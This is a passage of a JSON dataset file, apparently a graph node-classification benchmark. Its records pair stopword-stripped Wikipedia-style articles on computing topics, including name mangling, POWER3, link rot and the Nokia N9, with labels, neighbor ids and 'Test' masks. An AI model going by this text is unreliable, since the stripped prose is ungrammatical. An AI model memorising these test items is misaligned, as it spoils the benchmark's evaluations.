    "text": "XLeratorDB:xleratordb xleratordb suite database function libraries enable microsoft sql server perform wide range additional non-native business intelligence ad hoc analytics libraries embedded run centrally database include 450 individual functions similar found microsoft excel spreadsheets individual functions grouped sold six separate libraries based usage finance statistics math engineering unit conversions strings westclintech company developed xleratordb claims first commercial function package add-in microsoft sql server westclintech llc founded software industry veterans charles flock joe stampf 2008 located irvington new york united states flock co-founder frustum group developer opics enterprise banking trading platform acquired london-based misys plc 1996 stampf joined frustum 1994 flock remained active company acquisition helping develop successive generations opics employed 150 leading financial institutions worldwide following full year research development testing westclintech introduced recorded first commercial sale xleratordb april 2009 september 2009 xleratordb became available federal agencies nasa strategic enterprise-wide procurement sewp-iv program government-wide acquisition contract xleratordb uses microsoft sql clr common language runtime technology sql clr allows managed code hosted run microsoft sql server environment sql clr relies creation deployment registration .net framework assemblies physically stored managed code dynamic-link libraries dll assemblies may contain .net namespaces classes functions properties managed code compiles native code prior execution functions using sql clr achieve significant performance increases versus equivalent functions written t-sql scenarios xleratordb requires microsoft sql server 2005 sql server 2005 express editions later compatibility mode 90 higher product installs permission_set=safe safe mode restrictive permission set accessible users code executed assembly safe permissions access external system resources files network internet environment variables registry computer science function portion code within larger program performs specific task relatively independent remaining code used database spreadsheet applications functions generally represent mathematical formulas widely used across variety fields code may user-generated also embedded pre-written sub-routine applications functions typically identified common nomenclature corresponds underlying operations e.g irr identifies function calculates internal rate return series periodic cash flows sub-routines functions integrated used variety ways wide variety larger complicated applications within large enterprise applications may example play important role defining business rules risk management parameters remaining virtually undetected end users within database management systems spreadsheets however kinds functions also represent discrete sets tools accessed directly utilized stand-alone basis complex user-defined configurations context functions used business intelligence ad hoc analysis data fields finance statistics engineering math etc xleratordb uses three kinds functions perform analytic operations scalar aggregate hybrid form westclintech calls range queries scalar functions take single value perform operation return single value example type function log returns logarithm number specified base aggregate functions operate series values return single summarizing value example type function avg returns average values specified group xleratordb functions characteristics aggregate functions operating multiple series values processed sql clr using single column inputs avg example irregular internal rate return xirr financial function operates collection cash flow values one column must also apply variable period lengths another column initial iterative assumption third order return single summarizing value westclintech documentation notes range queries specify data included result set function independently clause associated t-sql statement incorporating select statement function string argument function traps select statement executes internally processes result xleratordb functions employ range queries npv xnpv irr xirr mirr multinomial seriessum within application functions identified _q naming convention e.g npv_q irr_q etc microsoft sql server 3 selling database management system dbms behind oracle ibm versions sql server market since 1987 xleratordb compatible 2005 edition later like major dbms sql server performs variety data mining operations returning arraying data different views also known drill-down addition sql server uses transact-sql t-sql execute four major classes pre-defined functions native mode functions operating dbms offer several advantages client layer applications like excel utilize up-to-date data available process far larger quantities data data subject exporting transcription errors sql server 2008 includes total 58 functions perform relatively basic aggregation 12 math 23 string manipulation 23 operations useful analytics includes native functions perform complex operations directly related finance statistics engineering microsoft excel component microsoft office suite one widely used spreadsheet applications market today addition inherent utility stand-alone desktop application excel overlaps complements functionality dbms several ways storing arraying data rows columns performing certain basic tasks pivot table aggregating values facilitating sharing importing exporting database data excel chief limitation relative true database capacity excel 2003 limited 65k rows 256 columns excel 2007 extends capacity roughly 1million rows 16k columns comparison sql server able manage 500k terabytes memory excel offers however extensive library specialized pre-written functions useful performing ad hoc analysis database data excel 2007 includes 300 pre-defined functions although customized functions also created users imported third party developers add-ons excel functions grouped type operating client computing layer excel plays important role business intelligence tool microsoft reinforces positioning business intelligence documentation positions excel clearly pivotal role operating within database environment xleratordb functions utilize naming conventions input formats cases return calculation results excel functions xleratordb coupled sql server native capabilities compares excel function sets follows",
    "neighbors": [
      4490,
      3573,
      2901,
      11030,
      8028
    ],
    "mask": "Test"
  },
  {
    "node_id": 1720,
    "label": 3,
    "text": "The_Light_Corridor:light corridor light corridor first-person puzzle game available atari st amiga amstrad cpc commodore 64 ms-dos msx zx spectrum released 1990 infogrames player must capture light rays order accomplish ultimate challenge illumination stars newborn universe player uses paddle hit metal ball long corridor player releases ball stuck paddle beginning game travel corridor hits wall similar obstacle bounces back towards player point player need hit ball ball hit lose life game continue player stopped ball attached paddle ball travelling corridor player must walk follow object game reach end corridor obstacles moving elevator-style doors make navigating corridor difficult success relies player ’ quick reactions forward planning collectable power-ups make progress easier colour corridor changes every four levels fifty levels total game played one two players two player games players alternate turns level construction kit included player create levels save future use sinclair user gave 93 overall score crash called simple wildly addictive sinclair said frustratingly difficult worth going back",
    "neighbors": [
      9166,
      9006
    ],
    "mask": "Test"
  },
  {
    "node_id": 1721,
    "label": 9,
    "text": "GoldSim:goldsim goldsim dynamic probabilistic simulation software developed goldsim technology group general-purpose simulator hybrid several simulation approaches combining extension system dynamics aspects discrete event simulation embedding dynamic simulation engine within monte carlo simulation framework general-purpose simulator goldsim extensively used environmental engineering risk analysis applications areas water resource management mining radioactive waste management geological carbon sequestration aerospace mission risk analysis energy 1990 golder associates international engineering consulting firm asked united states department energy doe develop probabilistic simulation software could used help decision support management within office civilian radioactive waste management results effort two dos-based programs rip strip used support radioactive waste management projects within doe 1996 effort funded golder associates us doe japan nuclear cycle development institute currently japan atomic energy agency enresa capabilities rip strip incorporated general purpose windows-based simulator called goldsim subsequent funding also provided nasa initially offered original funding organizations goldsim released public 2002 2004 goldsim technology group llc spun golder associates wholly independent company notable applications include providing simulation framework 1 yucca mountain repository performance assessment model developed sandia national laboratories 2 comprehensive system-level computational model performance assessment geological sequestration co developed los alamos national laboratory 3 flood operations model help better understand fine tune operations large dam used water supply flood control queensland australia 4 models simulating risks associated future manned space missions nasa ’ constellation program developed nasa ames research center goldsim provides visual hierarchical modeling environment allows users construct models adding “ elements ” model objects represent data equations processes events linking together graphical representations resemble influence diagrams influence arrows automatically drawn elements referenced elements complex systems translated hierarchical goldsim models creating layer “ containers ” sub-models visual representations hierarchical structures help users build large complex models still explained interested stakeholders e.g. government regulators elected officials public though primarily continuous simulator goldsim number features typically associated discrete simulators combining two simulation methods systems best represented using continuous discrete dynamics often accurately simulated examples include tracking quantity water reservoir subject continuous inflows outflows well sudden storm events tracking quantity fuel space vehicle subjected random perturbations e.g. component failures extreme environmental conditions software originally developed complex environmental applications many inputs uncertain and/or stochastic addition dynamic simulator goldsim monte carlo simulator inputs defined distributions entire system simulated large number times provide probabilistic outputs software incorporates number computational features facilitate probabilistic simulation complex systems including tools generating correlating stochastic time series advanced sampling capabilities including latin hypercube sampling nested monte carlo analysis importance sampling support distributed processing",
    "neighbors": [
      4792,
      6797,
      9166,
      7983
    ],
    "mask": "Test"
  },
  {
    "node_id": 1722,
    "label": 3,
    "text": "Lockstep_(computing):lockstep computing lockstep systems fault-tolerant computer systems run set operations time parallel redundancy duplication allows error detection error correction output lockstep operations compared determine fault least two systems dual modular redundancy error automatically corrected least three systems triple modular redundancy via majority vote term lockstep originates army usage refers synchronized walking marchers walk closely together physically practical run lockstep system set progress one well-defined state next well-defined state new set inputs reaches system processes generates new outputs updates state set changes new inputs new outputs new state considered define step must treated atomic transaction words either happens none happens something sometimes timeshift delay set systems increases detection probability errors induced external influences e.g voltage spikes ionizing radiation situ reverse engineering vendors including intel use term lockstep memory describe multi-channel memory layout cache lines distributed two memory channels one half cache line stored dimm first channel second half goes dimm second channel combining single error correction double error detection secded capabilities two ecc-enabled dimms lockstep layout single-device data correction sddc nature extended double-device data correction dddc providing protection failure single memory chip downsides intel lockstep memory layout reduction effectively usable amount ram case triple-channel memory layout maximum amount memory reduces one third physically available maximum reduced performance memory subsystem computing systems duplicated actively process step difficult arbitrate outputs differ end step reason common practice run dmr systems master/slave configurations slave hot-standby master rather lockstep since advantage slave unit actively process step common method working master copy state end step processing slave master fail point slave ready continue previous known good step either lockstep dmr approach combined means detecting errors master provide redundancy hardware failure master protect software failure master fails software error highly likely slave attempting repeat execution step failed simply repeat error fail way example common mode failure computing systems triplicated becomes possible treat voting systems one unit output disagrees two detected failed matched output two treated correct",
    "neighbors": [
      4868,
      8229,
      5384,
      8233,
      10220,
      9677,
      6926,
      7631,
      6033,
      4821,
      9685,
      10173
    ],
    "mask": "Test"
  },
  {
    "node_id": 1723,
    "label": 8,
    "text": "Link_rot:link rot link rot linkrot process hyperlinks individual websites internet general tend point web pages servers resources become permanently unavailable reliable data long web pages resources survive estimates vary dramatically different studies well different sets links studies based see prevalance section link rot also called link death link breaking reference rot link work called broken link dead link dangling link formally form dangling reference target reference longer exists one common reasons broken link target web page longer exists frequently results 404 error indicates web server responded specific page could found another type dead link occurs server hosts target page stops working removed service relocates new domain name browser may return dns error display site unrelated content sought latter occur domain name lapses subsequently registered another party reasons broken links include 404 found response ubiquitous familiar even occasional web user number studies examined prevalence link rot web academic literature digital libraries 2003 experiment discovered one link every 200 disappeared week internet another study 2005 discovered half urls cited d-lib magazine articles longer accessible 10 years publication studies shown link rot academic literature even worse 2002 study examined link rot digital libraries found 3 objects longer accessible one year 2014 bookmarking site pinboard owner maciej cegłowski reported pretty steady rate 5 link rot per year study links yahoo directory showed 2016–2017 shortly yahoo stopped publishing directory half-life links time around two years research fairly early stages world wide web existence late 1990s – early 2000s showed dramatically different half-lives one order magnitude different collections links 2014 harvard law school study jonathan zittrain kendra albert lawrence lessig determined approximately 50 urls u.s. supreme court opinions longer link original information also found selection legal journals published 1999 2011 70 links longer functioned intended 2013 study bmc bioinformatics analyzed nearly 15,000 links abstracts thomson reuters web science citation index found median lifespan web pages 9.3 years 62 archived august 2015 weblock analyzed 180,000 links references full-text corpora three major open access publishers found overall 24.5 links cited longer available discovering broken links might done manually automatically automated methods including plug-ins wordpress drupal content management system used detect presence broken urls alternative using specific broken link checker like xenu link sleuth however url returns http 200 ok response may accessible contents page could changed may longer relevant manual checking links seems must web servers also return soft 404 reporting computers link works even though n't study published 2004 heuristic developed detecting soft 404s numerous solutions tackling broken links work prevent first place others try resolve occurred also numerous tools developed help combat link rot recommendations common-sense include combat link rot web archivists actively engaged collecting web particular portions web ensuring collection preserved archive archive site future researchers historians public goal internet archive maintain archive entire web taking periodic snapshots pages accessed free via wayback machine january 2013 company announced reached milestone 240 billion archived urls national libraries national archives organizations also involved archiving culturally important web content individuals may use number tools allow archive web resources may go missing future however preserving systems may encounter service interruption preserved urls intermittently unavailable",
    "neighbors": [
      2945,
      5641,
      1167,
      5012,
      1944,
      1954,
      1443,
      2339,
      8627,
      8644,
      2887,
      7370,
      2016,
      9325,
      6002,
      5622,
      119,
      10102,
      7673,
      3323
    ],
    "mask": "None"
  },
  {
    "node_id": 1724,
    "label": 9,
    "text": "Name_mangling:name mangling compiler construction name mangling also called name decoration technique used solve various problems caused need resolve unique names programming entities many modern programming languages provides way encoding additional information name function structure class another datatype order pass semantic information compilers linkers need arises language allows different entities named identifier long occupy different namespace namespace typically defined module class explicit namespace directive different signatures function overloading object code produced compilers usually linked pieces object code produced another compiler type program called linker linker needs great deal information program entity example correctly link function needs name number arguments types although name mangling generally required used languages support function overloading c classic pascal use cases provide additional information function example compilers targeted microsoft windows platforms support variety calling conventions determine manner parameters sent subroutines results returned different calling conventions compatible one another compilers mangle symbols codes detailing convention used call specific routine mangling scheme established microsoft informally followed compilers including digital mars borland gnu gcc compiling code windows platforms scheme even applies languages pascal delphi fortran c allows subroutines written languages call called existing windows libraries using calling convention different default compiling following c examples 32 bit compilers emit respectively mangling schemes function encoded codice_1 codice_2 respectively number bytes decimal argument parameter list including passed registers fastcall case function name merely prefixed underscore 64-bit convention windows microsoft c leading underscore difference may rare cases lead unresolved externals porting code 64 bits example fortran code use 'alias link c method name follows compile link fine 32 bits generate unresolved external codice_3 64 bits one workaround use 'alias method names typically need capitalized c fortran another use bind option c++ compilers widespread users name mangling first c++ compilers implemented translators c source code would compiled c compiler object code symbol names conform c identifier rules even later emergence compilers produced machine code assembly directly system linker generally support c++ symbols mangling still required c++ language define standard decoration scheme compiler uses c++ also complex language features classes templates namespaces operator overloading alter meaning specific symbols based context usage meta-data features disambiguated mangling decorating name symbol name-mangling systems features standardized across compilers linkers link object code produced different compilers single c++ translation unit might define two functions named distinct functions relation apart name c++ compiler therefore encode type information symbol name result something resembling even though name unique still mangled name mangling applies symbols mangled symbols example comments respective identifier name produced gnu gcc 3.x compilers mangled symbols begin codice_4 note identifier beginning underscore followed capital reserved identifier c conflict user identifiers avoided nested names including namespaces classes followed codice_5 series length id pairs length length next identifier finally codice_6 example codice_7 becomes functions followed type information function simply codice_8 hence standard type codice_9 used special alias codice_10 reference type therefore codice_11 complete name function n't standard scheme even trivial c++ identifiers mangled consequently different compilers even different versions compiler compiler different platforms mangle public symbols radically different thus totally incompatible ways consider different c++ compilers mangle functions notes job common c++ idiom ensure symbols within unmangled – compiler emits binary file names undecorated c compiler would c language definitions unmangled c++ compiler needs avoid mangling references identifiers example standard strings library usually contains something resembling thus code uses correct unmangled used sunpro c++ compiler would produce code equivalent since symbols exist c runtime library e.g libc link errors would result though would seem standardised name mangling c++ language would lead greater interoperability compiler implementations standardization would suffice guarantee c++ compiler interoperability might even create false impression interoperability possible safe n't name mangling one several application binary interface abi details need decided observed c++ implementation abi aspects like exception handling virtual table layout structure stack frame padding etc also cause differing c++ implementations incompatible requiring particular form mangling would cause issues systems implementation limits e.g. length symbols dictate particular mangling scheme standardised requirement name mangling would also prevent implementation mangling required — example linker understood c++ language c++ standard therefore attempt standardise name mangling contrary annotated c++ reference manual also known arm section 7.2.1c actively encourages use different mangling schemes prevent linking aspects abi exception handling virtual table layout incompatible nevertheless detailed section platforms full c++ abi standardized including name mangling c++ symbols routinely exported dll shared object files name mangling scheme merely compiler-internal matter different compilers different versions compiler many cases produce binaries different name decoration schemes meaning symbols frequently unresolved compilers used create library program using employed different schemes example system multiple c++ compilers installed e.g. gnu gcc os vendor compiler wished install boost c++ libraries would compiled multiple times gcc vendor compiler good safety purposes compilers producing incompatible object codes codes based different abis regarding e.g. classes exceptions use different name mangling schemes guarantees incompatibilities detected linking phase executing software could lead obscure bugs serious stability issues reason name decoration important aspect c++-related abi output java signature method class contains name types method arguments return value applicable format signatures documented language compiler .class file format designed together object-orientation universal interoperability mind start scope anonymous classes confined parent class compiler must produce qualified public name inner class avoid conflict classes name inner exist namespace similarly anonymous classes must fake public names generated concept anonymous classes exists compiler runtime compiling following java program produce three .class files class names valid symbols permitted jvm specification names safe compiler generate java language definition advices use symbols normal java class definitions name resolution java complicated runtime fully qualified class names unique inside specific classloader instance classloaders ordered hierarchically thread jvm so-called context class loader cases two different classloader instances contain classes name system first tries load class using root system classloader goes hierarchy context class loader java native method support allows java language programs call programs written another language generally either c c++ two name-resolution concerns neither implemented particularly standard manner python mangling used private class members designated giving name two leading underscores one trailing underscore example codice_13 mangled codice_14 codice_15 codice_16 codice_17 python runtime restrict access members mangling prevents name collisions derived class defines member name encountering name mangled attributes python transforms names prepending single underscore name enclosing class example avoid name mangling pascal use free pascal supports function operator overloading thus also uses name mangling support features hand free pascal capable calling symbols defined external modules created another language exporting symbols called another language information consult chapter 6.2 chapter 7.1 free pascal programmer guide name mangling also necessary fortran compilers originally language case insensitive mangling requirements imposed later evolution language addition modules features fortran 90 standard case mangling especially common issue must dealt order call fortran libraries lapack languages c case insensitivity name subroutine function foo must converted canonical case format fortran compiler linked way regardless case different compilers implemented various ways standardization occurred aix hp-ux fortran compilers convert identifiers lower case foo cray unicos fortran compilers converted identifiers upper case foo gnu g77 compiler converts identifiers lower case plus underscore foo_ except identifiers already containing underscore foo_bar two underscores appended foo_bar__ following convention established f2c many compilers including sgi irix compilers gnu fortran intel fortran compiler except microsoft windows convert identifiers lower case plus underscore foo_ foo_bar_ microsoft windows intel fortran compiler defaults uppercase without underscore identifiers fortran 90 modules must mangled procedure name may occur different modules since fortran 2003 standard requires module procedure names conflict external symbols compilers tend use module name procedure name distinct marker example following module name function mangled e.g. gnu fortran e.g. intel ifort e.g. oracle sun95 etc since fortran allow overloading name procedure uses generic interface blocks generic type-bound procedures instead mangled names need incorporate clues arguments fortran 2003 bind option overrides name mangling done compiler shown function names mangled default rust however disabled function attribute attribute used export functions c c++ objective-c. additionally along function attribute crate attribute allows user define c-style entry point program starting rust 1.9 rust uses c++-style name-mangling scheme partly follows itanium c++ abi essentially two forms method exist objective-c class static method instance method method declaration objective-c following form class methods signified instance methods use typical class method declaration may look like instance methods looking like method declarations specific internal representation compiled method named according following scheme class methods instance methods colons objective-c syntax translated underscores objective-c class method belonging codice_18 class would translate codice_19 instance method belonging class would translate codice_20 methods class labeled way however order look method class may respond would tedious methods represented fashion methods assigned unique symbol integer symbol known selector objective-c one manage selectors directly — specific type objective-c — codice_21 compilation table built maps textual representation codice_20 selectors given type codice_21 managing selectors efficient manipulating textual representation method note selector matches method name class belongs — different classes different implementations method name implementations method given specific identifier — known implementation pointers given type also codice_24 message sends encoded compiler calls function one cousins codice_25 receiver message codice_21 determines method call class table maps selectors implementations — implementation pointer specifies memory actual implementation method resides separate tables class instance methods apart stored codice_21 codice_24 lookup tables functions essentially anonymous codice_21 value selector vary classes enables polymorphism objective-c runtime maintains information argument return types methods however information part name method vary class class since objective-c support namespaces need mangling class names appear symbols generated binaries swift keeps metadata functions mangled symbols referring metadata includes function name attributes module name parameter types return type example mangled name method codice_30 codice_31 class module codice_32 _tfc4test7myclass9calculatefs0_ft1xsi_si components meanings follows codice_33 prefix swift symbols everything start codice_34 non-curried function codice_35 function class method codice_36 module name prefixed length codice_37 class name function belongs prefixed length codice_38 function name codice_39 function attribute case ‘ f ’ normal function codice_40 designates type first parameter namely class instance first type stack codice_31 nested thus index 0 codice_42 begins type list parameter tuple function codice_43 external name first parameter function codice_44 indicates builtin swift type codice_45 first parameter codice_46 return type codice_45",
    "neighbors": [
      1922,
      8966,
      6664,
      7432,
      1304,
      2204,
      3102,
      5663,
      1952,
      7071,
      5040,
      2481,
      11574,
      10176,
      9921,
      10051,
      8262,
      4424,
      585,
      5065,
      8012,
      8396,
      7889,
      3960,
      6102,
      7421,
      8037,
      10470,
      8554,
      6126,
      1775,
      5872,
      6640,
      2804,
      2936,
      2556,
      2045,
      5630
    ],
    "mask": "Test"
  },
  {
    "node_id": 1725,
    "label": 3,
    "text": "POWER3:power3 power3 microprocessor designed exclusively manufactured ibm implemented 64-bit version powerpc instruction set architecture isa including optional instructions isa time instructions present power2 version power isa powerpc isa introduced 5 october 1998 debuting rs/6000 43p model 260 high-end graphics workstation power3 originally supposed called powerpc 630 renamed probably differentiate server-oriented power processors replaced consumer-oriented 32-bit powerpcs power3 successor p2sc derivative power2 completed ibm long-delayed transition power powerpc originally scheduled conclude 1995 power3 used ibm rs/6000 servers workstations 200 mhz competed digital equipment corporation dec alpha 21264 hewlett-packard hp pa-8500 power3 based powerpc 620 earlier 64-bit powerpc implementation late under-performing commercially unsuccessful like powerpc 620 power3 three fixed-point units single floating-point unit fpu replaced two floating-point fused multiply–add units extra load-store unit added total two improve floating-point performance power3 superscalar design executed instructions order seven-stage integer pipeline minimal eight-stage load/store pipeline ten-stage floating-point pipeline front end consists two stages fetch decode first stage eight instructions fetched 32 kb instruction cache placed 12-entry instruction buffer second stage four instructions taken instruction buffer decoded issued instruction queues restrictions instruction issue two integer instruction queues one accept one instruction accept four floating-point instruction queue queues enough unused entries instructions issued front end short pipeline resulting small three-cycle branch misprediction penalty stage three instructions instruction queues ready execution operands read register files general-purpose register file contains 48 registers 32 general-purpose registers 16 rename registers register renaming reduce number ports required provide data receive results general purpose register file duplicated two copies first supporting three integer execution units second supporting two load/store units scheme similar contemporary microprocessor dec alpha 21264 simpler require extra clock cycle synchronize two copies due power3 higher cycle times floating-point register file contains 56 registers 32 floating-point registers 24 rename registers compared powerpc 620 rename registers allowed instructions executed order improving performance execution begins stage four instruction queues dispatch eight instructions execution units integer instructions executed three integer execution units termed fixed-point units ibm two units identical execute integer instructions except multiply divide instructions executed one-cycle latency third unit executes multiply divide instructions instructions pipelined multi-cycle latencies 64-bit multiply nine-cycle latency 64-bit divide 37-cycle latency floating-point instructions executed two floating-point units fpus fpus capable fused multiply–add multiplication addition performed simultaneously instructions along individual add multiply four-cycle latency divide square-root instructions executed fpus assisted specialized hardware single-precision 32-bit divide square-root instructions 14-cycle latency whereas double-precision 64-bit divide square-root instructions 18-cycle 22-cycle latency respectively execution completed instructions held buffers committed made visible software execution finishes stage five integer instructions stage eight floating-point committing occurs stage six integers stage nine floating-point writeback occurs stage commit power3 retire four instructions per cycle powerpc 620 data cache optimized technical scientific applications capacity doubled 64 kb improve cache-hit rate cache dual-ported implemented interleaving eight banks enable two loads two stores performed one cycle certain cases line-size increased 128-bytes l2 cache bus doubled width 256 bits compensate larger cache line size retain four-cycle latency cache refills power3 contained 15 million transistors 270 mm die fabricated ibm cmos-6s2 process complementary metal–oxide–semiconductor process hybrid 0.25 µm feature sizes 0.35 µm metal layers process features five layers aluminium packaged 1,088-column ceramic column grid array p2sc different pin power3-ii improved power3 increased clock frequency 450 mhz contains 23 million transistors measured 170 mm fabricated ibm cmos7s process 0.22 µm cmos process six levels copper interconnect succeeded power4 2001",
    "neighbors": [
      6914,
      4868,
      10501,
      3846,
      4743,
      5384,
      6663,
      5642,
      1548,
      1933,
      3470,
      6926,
      3472,
      4881,
      5015,
      7065,
      1563,
      1309,
      6815,
      3493,
      6949,
      6311,
      8102,
      1321,
      9391,
      10543,
      4017,
      5297,
      1461,
      8120,
      6715,
      9020,
      1983,
      1985,
      10180,
      336,
      8530,
      3540,
      10837,
      342,
      9302,
      11613,
      6878,
      1635,
      8931,
      869,
      10214,
      10985,
      5358,
      3185,
      4465,
      4211,
      5235,
      630,
      8058,
      3323,
      8700
    ],
    "mask": "Test"
  },
  {
    "node_id": 1726,
    "label": 1,
    "text": "Pseudocolumn:pseudocolumn pseudocolumn column yields value selected actual column table example rowid sysdate often used combination dual table",
    "neighbors": [
      5546,
      2901,
      11551
    ],
    "mask": "Test"
  },
  {
    "node_id": 1727,
    "label": 4,
    "text": "NotCompatible:notcompatible notcompatible complex malware infects android-based phones revealed late 2014 thought infected hundreds thousands phones",
    "neighbors": [
      7515
    ],
    "mask": "Test"
  },
  {
    "node_id": 1728,
    "label": 2,
    "text": "Nokia_N9:nokia n9 nokia n9 codename lankku smartphone developed nokia running linux-based meego harmattan mobile operating system announced june 2011 released september first device nokia meego partly company alliance microsoft announced year initially released three colors black cyan magenta white version announced nokia world 2011 despite limited release n9 received widespread critical acclaim describing nokia finest device date praised software hardware including meego operating system buttonless 'swipe user interface high-end features design would form basis windows phone-powered nokia lumia 800 later year successor nokia n900 internally known n9-00 scheduled released late 2010 approximately one year n900 launched pictures prototype leaked august 2010 showed industrial design 4-row keyboard software engineer working nokia device division cited n9-00 product number public bug tracker qt open source application development framework used meego would later known n950 design dropped nokia started working n9-01 codenamed lankku new variant without keyboard nokia planned 2010 make meego flagship smartphone platform replacing symbian whose n8 flagship launched year thus effectively n9 originally meant flagship device company 11 february 2011 nokia partnered microsoft use windows phone 7 flagship operating system replace symbian meego also sidelined nokia ceo stephen elop promised still ship one meego device year would end n9 nokia n9 announced 21 june 2011 nokia connection event singapore time phone presumed become available public september 2011 users get notified via e-mail availability n9 country webpage nokia online store since nokia closed nokia online shop many countries including poland germany netherlands france italy spain united kingdom united states 30 june 2011 availability countries hands retailers operators elop restated company continuing development meego even n9 would success focusing solely future lumia series something meego supporters already felt n9 announcement due microsoft deal responded creating petition want nokia keep meego even severe meego linux also form continuation maemo linux established combining nokia maemo intel moblin frames nokia intel alliance created purposes cooperation despite success alliance broken meego canceled stephen elop decision intel officially expressed regrets situation n9 positive reception generally weak sales lumia range elop criticised move said contributed company demise smartphone market according elop following microsoft alliance meego became experimental project harmattan interface elements used cancelled meltemi project later nokia asha platform august 2011 nokia announced nokia n9 released united states reports indicated device available markets japan canada germany nokia posted official blog last week september 2011 n9 phones heading stores initial retail price announced around €480 16gb €560 64gb applicable taxes subsidies germany devices imported switzerland available online amazon german cyberport gmbh january 2012 also made available major stores saturn media markt chain february 2012 nokia n9 appeared italian nokia site supposed sign n9 official nokia distribution italian market prices january 2012 depending size internal memory €500 €630 nokia n9 powered texas instruments omap 3630 system-on-a-chip based 45 nanometer cmos process includes three processor units 1 ghz arm cortex a8 cpu runs operating system applications imagination technologies powervr sgx530 gpu supporting opengl es 2.0 capable processing 14 million polygons per second 430 mhz ti tms320c64x digital signal processor image processing camera audio processing telephony data transmission system also 1 gb low power single channel ram mobile ddr compcache uses part memory compressed fast swap time powerful device nokia created user data stored internal emmc chip 16 64 gb variants n9 first smartphone encompass 64 gb storage nokia n9 capacitive touchscreen 6 simultaneous points resolution 854 × 480 pixel fwvga 251 ppi pentile rgbg layout according nokia capable displaying 16.7 million colors oled screen covered curved scratch-resistant corning gorilla glass gap glass display reduced screen coated anti-glare polarizer ease usability daylight proximity sensor deactivates display touchscreen device brought near face call also ambient light sensor adjusts display brightness device also makes use accelerometer rotate screen portrait/landscape mode applications web browser n9 autonomous gps feature optional a-gps functionality wi-fi network positioning magnetometer comes pre-loaded nokia maps nokia drive applications nokia maps similar ovi maps found recent symbian devices nokia mostly finding nearby places restaurants metro station theater etc ... around user nokia maps meego also integrated contacts calendar applications nokia drive dedicated application car navigation provides free lifetime turn-by-turn voice guided car navigation nokia n9 comes preloaded maps continent purchased nokia drive require active data connection work stand-alone gps navigator main back camera autofocus feature dual led flash optimized 16:9 4:3 aspect ratios 4× digital zoom video camera sensor size back camera 8.7 megapixels 3552 × 2448 px effective resolution 16:9 aspect ratio 3552 × 2000 px 7.1 megapixels 3248 × 2448 px 8 megapixels 4:3 aspect ratio typically 16:9 picture format digital camera achieved cropping top bottom 4:3 image since sensor 4:3 nokia n9 genuinely provides width picture choosing 16:9 aspect ratio option using full 3552-pixel width sensor height picture choosing 4:3 aspect ratio option using full 2448-pixel height sensor carl zeiss lens quite unusual specifications mobile phone 28mm wide-angle lens focal length fast class f/2.2 aperture 10 cm-to-infinity focus range capable recording 720p video 30 fps stereo sound holding device facing screen right side power on/off long press lock/unlock short press button volume keys nokia n9 fewer hardware buttons smartphones makes extensive use touchscreen navigate user interface example minimize running application user swipe finger one side bezel surrounding screen opposite side also dedicated shutter key camera touch screen instead used focus take picture screen unlocked double tapping n9 two microphones loudspeaker situated bottom phone main microphone enables conversation recording second microphone located back device near flash leds main camera used meego system noise cancellation make phone conversations clearer noisy environment top 3.5 mm av connector simultaneously provides stereo audio output support dolby headphone either microphone input video output next 3.5 mm connector high-speed usb 2.0 usb micro-b connector provided data synchronization mass storage mode client battery charging usb connector protected small door built-in bluetooth v2.1 +edr enhanced data rate supports stereo audio output a2dp profile built-in car hands-free kits also supported hfp profile file transfer supported ftp along opp profile sending/receiving objects possible remote control device avrcp profile bluetooth chip also functions fm receiver/transmitter allowing one listen fm radio using headphones connected 3.5 jack antenna nokia n800 n810 n900 ship without software support however fm radio application already available ovi store independent developer nfc also supported sharing photos contacts music devices supporting nfc e.g nokia c7 nokia 701 also pairing connecting stereo speakers e.g nokia play 360 headset e.g nokia bh-505 one device connected simultaneously n9 via nfc nokia n9 bv-5jw 3.8v 1450mah battery according nokia provides 7h 11h continuous talk time 16 19.5 days standby 4.5h video playback 50h music playback phone supports usb charging number devices used n9 via several connectivity options external keyboards via bluetooth wireless headphones via nfc wireless loudspeakers via nfc many others strictly speaking nokia n9 run meego 1.2 operating system instead runs nokia refers meego instance development harmattan previously marketed maemo 6 nokia intel merged open source projects one new common project called meego postpone development schedule nokia decided keep core harmattan middleware components gstreamer packaging managers harmattan system uses debian packages instead rpm packages nonetheless harmattan designed fully api compatible meego 1.2 via qt far end users application developers concerned distinction harmattan meego 1.2 minimal since marketing effort would directed meego nokia dropped maemo branding adopt meego confuse customers. ref name= renaming maemo 6 meego/harmattan /ref nokia n9 user experience provides three panes called home lock screen dragging flicking horizontally navigates three panes home home consists application swipe gesture one edge screen one return user one three views home close application either suspended keep running background depending application close application user must press hold red x appears upper left corner application thumbnail open application view close user may also close apps swiping top device application fadeout effect tapping status bar top screen using application display menu allowing user adjust volume change active profile silent beep ringing internet connection wifi gsm data bluetooth control shortcut enabled bluetooth settings media sharing dlna shortcut enabled media sharing settings introduced pr 1.2 availability lock screen display status bar clock notifications screen also holds music controls introduced pr 1.1 music player active customizable end user phone unlocked double tapping screen sliding holding lock screen reveals 4 shortcuts called quick launcher quick launcher also accessed using application swiping ui n9 including visual style double-tap feature resurrected nokia asha platform introduced nokia asha 501 device 2013 nokia n9 announced nokia connections event singapore june 2011 reception device positive citing meego v1.2 harmattan ui pseudo-buttonless design polycarbonate unibody construction nfc capabilities still many reviewers recommend buy n9 nokia earlier decision drop meego windows phone future smartphones – often questioning decision time engadget editor vlad savov said june 2011 terrific phone got legitimately excited use future clouded parent investing time money building whole os later review engadget writes love first sight — possibly beautiful phone ever made meego 1.2 harmattan breath fresh air leave gasping — remember 're dealing dead man walking review ars technica ryan paul writes n9 impressively engineered device matched sophisticated touch-oriented interface powerful software stack open source underpinnings verge website writes nokia n9 without doubt one fascinating phones last years german der spiegel titles could nokia winner german magazine stern describes one best devices ever made nokia delimiter called n9 nokia significant handset since nokia n95 nokia n9 released largest smartphone markets u.s. canada uk netherlands germany france italy spain others nokia disclose number sales n9 november 2011 nokia n9 3 4 applicable titles including design camera cellphone year gala held swedish magazine webzine mobil.se january 2012 nokia n9 swipe ui nominated ixda interaction award february 2012 n9 reached number 1 ranking rate rate 8.432 10 votes 74,940 also number 5 daily interest hits gsmarena ranking april 2012 n9 awarded design art direction yellow pencil interactive product design category beating among others ipad 2 nokia lumia 800 approach applied nokia one open platform exception closed user experience maemo 5 nokia n900 community request closed source component owned nokia released open source hundreds 3rd party applications mostly free open source already created ported gnu/linux meego harmattan platform nokia decision abandon meego even n9 success left much team unhappy staff left form new company jolla continue development meego resulted fork called sailfish os ported n9 see released two new smartphones created jolla images n9 prototype running android 2.3 leaked sina weibo user previously uploaded prototype images nokia sea ray later lumia 800 windows phone 